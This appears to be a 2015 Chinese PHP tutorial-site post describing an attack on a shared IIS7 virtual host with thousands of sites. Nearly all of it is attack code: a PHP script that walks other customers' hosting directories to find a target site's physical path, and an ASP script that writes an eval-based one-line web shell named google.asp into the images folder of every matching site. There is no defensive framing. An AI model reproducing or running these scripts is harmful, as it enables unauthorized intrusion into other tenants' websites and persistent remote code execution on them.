来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 碰到个虚拟主机,iis7 0 里边有上万个站,只有脚本权限,没命令行权限,但是可以跨目录写文件 如果能得到目标站的物理目录,能立马搞定 但是想尽一切办法,也没找到物理路径 所以只有用脚...
<?php set_time_limit(0); $path = 'D:/Hosting'; $somefile = $_GET['key']; $logfile = 'D:/Hosting/6668835/html/images/ennumdir.txt'; if (!isset($_SERVER['PHP_AUTH_USER'])) { header('WWW-Authenticate: Basic realm="My Realm"'); header('HTTP/1.0 401 Unauthorized'); echo 'Text to send if user hits Cancel button'; exit; } else { if(is_dir($path) && is_readable($path)) { $path2 = ''; $handle = opendir($path); while(false !== ($filename = readdir($handle))) { if($filename{0} != $_GET['dir']) { continue; } /* if($filename{1} != $_GET['two']) { continue; } */ //$path2 = $path.'/'.$filename.'/html'; $path2 = $path.'/'.$filename; if(is_dir($path2) && is_readable($path2)) { @$handle2 = opendir($path2); while(false !== ($filename2 = readdir($handle2))) { if($filename2 == $somefile) { //echo'[+]Found !'.$filename2."\n"; file_put_contents($logfile,'[+]Found !'.$path2.'/'.$filename2."\n",FILE_APPEND); } } @closedir($handle2); } } file_put_contents($logfile,'[*]LAST '.$path2."\n",FILE_APPEND); closedir($handle); } } <% Server.ScriptTimeout=500000000 key = Trim(Request.QueryString("key")) msg=" <% eval(rquese(Chr(35)))%" &">" Set FSO=Server.CreateObject("Scripting.FileSystemObject") Set ServerFolder=FSO.GetFolder("C:\intel") Set ServerFolderList=ServerFolder.subfolders For Each ServerFileEvery IN ServerFolderList ' Response.write ServerFileEvery&"</br>" If LCase(Left(ServerFileEvery.name, 1)) = LCase(key) Then Set sServerFolder=FSO.GetFolder(ServerFileEvery) Set sServerFolderList=sServerFolder.subfolders For Each sServerFileEvery IN sServerFolderList If LCase(sServerFileEvery.name) = "images" Then StreamSaveToFile sServerFileEvery & "\google.asp", msg, "UTF-8" End If Next End If Next Function StreamSaveToFile(sPath, sContent, sCharSet) Dim oStream If(InStr(sPath, ":") <= 0)Then sPath = Replace(sPath, ",", ",") sPath = Server.MapPath(sPath) sPath = Replace(sPath, ",", ",") End If Set oStream = Server.CreateObject("Adodb.Stream") With oStream .Type = 2 .Mode = 3 .Open .Charset = sCharSet .WriteText sContent .SaveToFile sPath, 2 .Close End With Set oStream = Nothing End Function %>